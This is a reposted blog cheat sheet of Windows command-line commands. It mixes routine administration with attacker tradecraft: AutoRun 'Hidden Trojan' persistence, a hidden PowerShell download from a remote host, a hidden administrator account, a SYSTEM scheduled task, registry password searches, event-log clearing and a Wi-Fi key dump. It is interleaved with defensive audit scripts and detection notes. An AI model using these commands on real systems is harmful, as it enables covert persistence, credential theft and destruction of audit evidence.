Windows common commands

Besides hard work, there is no other way.

Sharing some commonly used Windows commands. This article will be updated over time, and all of the notes are backed up. Most of it is collected from the Internet; a small part is summarized from personal experience.

CMD Common Commands

Hidden Trojan (cmd.exe AutoRun persistence):

```vbscript
CreateObject("WScript.Shell").RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun", "calc.exe", "REG_SZ"
```

Once this value exists, every cmd.exe that starts executes the AutoRun command first (here the calculator) and then continues normally; the mechanism is the same one the cmd /k parameter uses. The same value under HKEY_LOCAL_MACHINE applies to every user, so an incident responder checks both hives, and a clean shell can be obtained with cmd /D, which disables AutoRun for that instance.
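As an added example (not code from the original post), the defender's side of the technique above: audit both Command Processor keys for an AutoRun value and optionally remove it. Nothing here is assumed beyond the two registry paths the text names and the fact that removing the HKLM value needs an elevated prompt.

```powershell
# Added example, not from the original post: audit (and optionally remove) the
# cmd.exe AutoRun persistence shown above. cmd.exe executes whatever string sits
# in HKCU\ or HKLM\Software\Microsoft\Command Processor\AutoRun on every start
# unless launched with /D, so both hives are checked.
function Get-CmdAutoRun {
    param(
        # Remove any AutoRun value found (the HKLM key needs an elevated prompt)
        [switch]$Remove
    )

    $hives = @(
        'HKCU:\Software\Microsoft\Command Processor',
        'HKLM:\Software\Microsoft\Command Processor'
    )

    foreach ($path in $hives) {
        $value = $null
        if (Test-Path $path) {
            $value = (Get-ItemProperty -Path $path -Name AutoRun -ErrorAction SilentlyContinue).AutoRun
        }

        $result = [pscustomobject]@{
            Key     = $path
            AutoRun = $value
            Removed = $false
        }

        # Benign AutoRun values exist (for example a user's own doskey macros),
        # so record the string as evidence before deleting it.
        if (-not [string]::IsNullOrEmpty($value) -and $Remove) {
            Remove-ItemProperty -Path $path -Name AutoRun -ErrorAction Stop
            $result.Removed = $true
        }

        $result
    }
}

# Report first; rerun with -Remove once the value has been recorded.
Get-CmdAutoRun | Format-Table -AutoSize
```

A populated AutoRun that points outside the Windows or Program Files directories, or at an interpreter such as powershell.exe or mshta.exe, is the usual sign of abuse; an empty result for both hives means cmd.exe starts clean.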

List the IE proxy settings:

```cmd
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
```

Download remote files:

```cmd
powershell -w hidden -c (new-object System.Net.WebClient).DownloadFile('http://www.xxx.com/lcx.1','d:\3.txt')
```

```cmd
bitsadmin /rawreturn /transfer getfile http://127.0.0.1:8080/test.zip F:\123.zip
```

-w hidden is short for -WindowStyle Hidden. bitsadmin is deprecated but still shipped; the transfer runs through the BITS service and is recorded in the Microsoft-Windows-Bits-Client/Operational event log, which is where defenders look for it.

Add a hidden account:

```cmd
net user test$ test /add
net localgroup administrators test$ /add
```

The first line creates the account test$ with the password test; the second adds it to the local Administrators group. The trailing $ hides the account from the net user listing, but it is still stored in the SAM and still appears in Computer Management (lusrmgr.msc), in wmic useraccount, and in Get-LocalUser.
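As an added example (not code from the original post), the audit that exposes the trick above: list every local account, mark the ones that net user does not show, and mark which of those are local administrators. It assumes an English-language Windows (the net user output is parsed by its English header and footer) and Windows 10 / Server 2016 or later for the LocalAccounts cmdlets.

```powershell
# Added example, not from the original post: find local accounts that the
# "net user" listing hides. net user omits names ending in "$", but the SAM
# still holds them and Get-LocalUser / Get-LocalGroupMember list them, so
# compare the two views and flag any hidden account that is also an admin.
function Get-HiddenLocalAccount {
    # Assumption: English output. net user prints a header, a dashed
    # separator, the names in columns, then "The command completed successfully."
    $visible = @()
    $inList = $false
    foreach ($line in (net user 2>$null)) {
        if ($line -match '^-{5,}') { $inList = $true; continue }
        if ($line -match 'completed successfully') { break }
        if ($inList) {
            $visible += ($line -split '\s+' | Where-Object { $_ })
        }
    }

    # Group members come back as COMPUTER\name; keep only the name part.
    $admins = Get-LocalGroupMember -Group 'Administrators' |
        ForEach-Object { ($_.Name -split '\\')[-1] }

    Get-LocalUser | ForEach-Object {
        [pscustomobject]@{
            Name            = $_.Name
            Enabled         = $_.Enabled
            DollarSuffix    = $_.Name.EndsWith('$')
            HiddenFromNet   = ($visible -notcontains $_.Name)
            IsLocalAdmin    = ($admins -contains $_.Name)
            LastLogon       = $_.LastLogon
        }
    }
}

# Everything net user hides, most dangerous first.
Get-HiddenLocalAccount |
    Where-Object { $_.HiddenFromNet -or $_.DollarSuffix } |
    Sort-Object IsLocalAdmin -Descending |
    Format-Table -AutoSize
```

An enabled account that is hidden from net user and sits in Administrators is the exact artifact the two net commands above leave behind; remove it with net user test$ /delete once it has been documented.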

List the installed patches:

```cmd
wmic qfe list full /format:htable > hotfixes.htm
wmic qfe get description,installedOn
```

Recursively search for login.html from the root of the D: drive:

```cmd
cd /d d:\ && dir login.html /a-d /b /s
```

/a-d excludes directories, /b prints bare paths, and /s recurses into subdirectories.

Enter a directory on another drive letter:

```cmd
d: & cd d:\Clover
```

cd on its own does not change the current drive, which is why the drive letter comes first; cd /d d:\Clover does both in one step.

Run a command in a new cmd instance:

```cmd
cmd /c whoami
```

/c runs the command and exits; /k runs it and keeps the new shell open.

Add a scheduled task:

```cmd
schtasks.exe /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:\1.exe" /ED 2016/12/12
```

This registers a task named FIREWALL that runs c:\1.exe as SYSTEM every 45 minutes until the end date given by /ED (the date format follows the system locale). Creating a task that runs as SYSTEM requires an elevated prompt; if you only have a normal user, replace SYSTEM in /RU with your own account name and the task is still created, running with your privileges.
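As an added example (not code from the original post), the hunt that catches tasks like the one above: walk every enabled scheduled task and report the ones whose action executes from outside the Windows or Program Files directories, together with the account they run as. The list of trusted roots is an assumption to be tuned for your own estate.

```powershell
# Added example, not from the original post: hunt for scheduled tasks such as
# the FIREWALL task created above, i.e. a high-privilege principal whose action
# runs a binary from an unusual location like C:\1.exe.
function Get-SuspiciousScheduledTask {
    param(
        # Assumption: actions under these roots are treated as expected. Tune per estate.
        [string[]]$TrustedRoots = @(
            "$env:SystemRoot\",
            "$env:ProgramFiles\",
            "${env:ProgramFiles(x86)}\"
        )
    )

    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # Only Exec actions carry an Execute property; COM handler actions do not.
            if (-not $action.Execute) { continue }

            # Expand %SystemRoot%-style variables and strip quoting before comparing.
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')

            $trusted = $false
            foreach ($root in $TrustedRoots) {
                if ($exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $trusted = $true
                    break
                }
            }

            # A bare name such as "1.exe" resolves via PATH and is flagged too.
            if (-not $trusted) {
                [pscustomobject]@{
                    TaskPath  = $task.TaskPath
                    TaskName  = $task.TaskName
                    RunAs     = $task.Principal.UserId
                    Execute   = $exe
                    Arguments = $action.Arguments
                    Author    = $task.Author
                }
            }
        }
    }
}

Get-SuspiciousScheduledTask | Sort-Object RunAs | Format-Table -AutoSize
```

Tasks that run as SYSTEM from a user-writable path, or whose action is an interpreter (cmd.exe, powershell.exe, wscript.exe) with a long argument string, deserve a look at the file and at who created the task; schtasks /Query /TN <name> /V /FO LIST shows the creation details for a single task.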

Process related:

```cmd
tasklist
taskkill /im <process name>
taskkill /pid <pid> /t /f
```

tasklist lists running processes; taskkill /im ends a process by image name and /pid by process ID. /t ends the process together with all of its child processes, and /f forces termination.

Check which security patches are missing on the Windows system:

Find password values stored in the registry:

```cmd
REG query HKCU /v "pwd" /s
```

/s searches every subkey; /v matches the value name exactly. pwd can be replaced with password, and HKCU with HKLM or HKCR.

List programs that run at startup:

```cmd
wmic startup list full
```

List the IP and MAC address of each NIC:

```cmd
wmic nicconfig get ipaddress,macaddress
```

The property names have no spaces: IPAddress and MACAddress.

View shares:

```cmd
wmic share get name,path
net share
```

View the location of the event logs on the system:

```cmd
wmic nteventlog get path,filename,writeable
```

Clear logs (requires an elevated prompt):

```cmd
wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
```

Clearing is itself logged: wiping the Security log writes event 1102 (audit log cleared) into the fresh Security log, and wiping any other log writes event 104 into the System log, so a blank log with one of these events at the top is a strong indicator on its own.

Running services:

```cmd
sc query type= service
net start
```

Installed software and versions:

```cmd
wmic product get name,version
```

Win32_Product only covers software installed through MSI, and querying it triggers a consistency check of every installed package, so it is slow and leaves MsiInstaller entries in the Application log. The Uninstall keys under HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall are the quieter alternative.

View the details of a process:

```cmd
wmic process where name="chrome.exe" list full
```

Display the wireless networks the system has connected to (run as administrator to reveal the keys):

```cmd
netsh wlan show profiles
```

One-liner to dump every saved wireless key:

```cmd
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
```

Type it at an elevated prompt; inside a .bat file the percent signs must be doubled (%%i, %%j). skip=9 depends on the exact layout of the English netsh output, so it breaks on other languages or different header lengths.
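As an added example (not code from the original post), the same extraction done with regular expressions instead of column positions, returning one object per profile. It assumes an English-language Windows (the field labels "All User Profile", "Authentication" and "Key Content" are matched literally) and an elevated prompt, since key=clear only reveals the key to an administrator.

```powershell
# Added example, not from the original post: dump saved Wi-Fi profiles and
# their keys by parsing "netsh wlan show profile" output with regexes rather
# than relying on the fixed column layout the for /f one-liner depends on.
function Get-WlanProfileKey {
    # Assumption: English field labels. Each profile line looks like
    #     All User Profile     : HomeNetwork
    $profiles = netsh wlan show profiles |
        Select-String -Pattern 'All User Profile\s*:\s*(.+)$' |
        ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }

    foreach ($name in $profiles) {
        # key=clear prints the PSK in "Key Content"; without elevation the field is absent.
        $detail = netsh wlan show profile name="$name" key=clear

        $auth = $detail | Select-String -Pattern 'Authentication\s*:\s*(.+)$' |
            ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() } |
            Select-Object -First 1

        $key = $detail | Select-String -Pattern 'Key Content\s*:\s*(.+)$' |
            ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() } |
            Select-Object -First 1

        if (-not $key) { $key = '<none: open network, enterprise auth, or not elevated>' }

        [pscustomobject]@{
            Profile        = $name
            Authentication = $auth
            Key            = $key
        }
    }
}

Get-WlanProfileKey | Format-Table -AutoSize
```

Profiles that use 802.1X (WPA2-Enterprise) have no PSK to reveal, so an empty key is not always a permissions problem; the Authentication column tells the two cases apart.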

Check whether the host is a virtual machine:

```cmd
wmic bios list full | find /i "vmware"
```

This only catches VMware; other hypervisors leave their own strings (for example "VirtualBox", "Hyper-V" or "QEMU") in the BIOS and in wmic computersystem get manufacturer,model.

Check whether PowerShell is available:

Motherboard product number and serial number:

```cmd
wmic baseboard get Product,SerialNumber
```

CMD LAN commands

arp -a: list the local ARP cache (the IP/MAC pairs this host has recently talked to; it is not a scan of the whole segment)
arp -a <ip>: show the cached MAC address of a specific host
arp -s <ip> <mac>: add a static IP-to-MAC binding
arp -d <ip>: delete the entry for that IP

net view: list the computers in the current domain or workgroup
net view /domain: list the domains and workgroups visible on the network
net view /domain:<domainname>: list the computers in the named domain or workgroup

ipconfig /all: show full adapter details (IP, DNS suffix, MAC, DHCP server)
ipconfig /release: release the DHCP lease
ipconfig /renew: obtain a new IP address from DHCP

telnet <ip> <port>: test whether a remote port accepts connections
nbtstat -A <ip>: query the remote host's NetBIOS name table by IP address (lowercase -a takes a host name instead)
tracert <hostname>: trace the route to a host; the first line also shows its resolved IP address

netstat -a -n: all connections and listening ports, with numeric addresses
netstat -an | find "3389": check whether RDP is listening or in use
netstat -a: see which ports are open
netstat -n: connection state with numeric addresses and ports
netstat -v: only exists on older Windows (XP); on current versions use -o to add the owning process ID and -b for the executable name (needs admin)
netstat -p tcp: show a single protocol (tcp, udp, tcpv6 or udpv6)
netstat -s: per-protocol statistics

nbtstat -n: list the local NetBIOS name table
nslookup <domain>: resolve a domain name to its IP address

DOS common shortcuts (type into Win+R or a prompt)

mspaint: Paint
calc: Calculator
notepad: Notepad
taskmgr: Task Manager
osk: On-Screen Keyboard
gpedit.msc: Local Group Policy Editor
services.msc: Services
compmgmt.msc: Computer Management
devmgmt.msc: Device Manager
winver: show the Windows version
magnify: Magnifier
eventvwr: Event Viewer
regedit: Registry Editor
resmon: Resource Monitor
wmic bios get releasedate: BIOS release date (a rough indication of when the machine was built)
mstsc /f: Remote Desktop connection, full screen

This article will keep collecting updates; comments are welcome!

Title: Windows common commands

Author: nmask

Published: 2017-03-08 20:03

Last updated: 2019-08-16 15:08

Original link: https://thief.one/2017/03/08/Windows common commands/

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.
